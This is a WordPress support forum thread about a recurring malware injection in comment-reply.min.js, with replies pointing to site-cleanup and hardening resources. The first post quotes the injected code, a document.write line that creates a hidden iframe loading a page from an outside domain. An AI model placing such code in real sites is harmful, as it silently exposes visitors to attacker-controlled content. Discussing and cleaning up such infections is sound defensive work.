WordPress.org

Forums

Latest Malware Attacks and Solution (7 posts)

  1. Samiullah
    Member
    Posted 2 years ago #

    I was facing frequent malware attacks on my wordpress site. Code injection was in this file wp-includes/js/comment-reply.min.js?ver=3.5.1. The code is with different urls like griebwal and many more.

    [document.write('<iframe name=Twitter scrolling=auto framebor
    der=no align=center height=2 width=2 src=http://168bet.com/c
    ocs.html?j=1194757></iframe>');]

    I removed this successfully and now my site is secure. I write a complete solution at this link.
    http://semioffice.com/wordpress/latest-malware-attacks-on-wordpress-sites-and-its-solution/

  2. catacaustic
    very awesome
    Posted 2 years ago #

    That's not a "solution". All you'v eodne is place the original file back there again. You didn't address anything about security, how to stop the attack/hack happening again, and what users should be looking for o doing in order to block things like this before they happen. I'm glad you ogt it working again, but you've only given around 10% of the actual solution there.

  3. Alex Poole
    Member
    Posted 2 years ago #

    I'm having the same problem, have manually removed the inserted code twice, then re-installed WP, but of course this hasn't solved the issue - it just keeps on coming back. I will sit down and attempt to fix this properly. Will report back.

  4. Andrew
    Forum moderator
    Posted 2 years ago #

    @Alex_Poole, you can discuss that on your own thread.

  5. osu9400
    Member
    Posted 2 years ago #

    having the same problem. HAs anyone figured out a solution?

  6. DJDoubleXL189
    Member
    Posted 2 years ago #

    Not that it's been posted countless times, but here are the links you need to clean your site. Additionally, you'll want to make sure that you're not using a theme that doesn't comply with WordPress standards. Themes that are older often run into such problems. You'll also want to make sure you have the latest versions of your plugins installed. Any plugins that haven't been updated in some time should be replaced.

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://codex.wordpress.org/Hardening_WordPress

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

  7. WPyogi
    Forum Moderator
    Posted 2 years ago #

Topic Closed

This topic has been closed to new replies.

About this Topic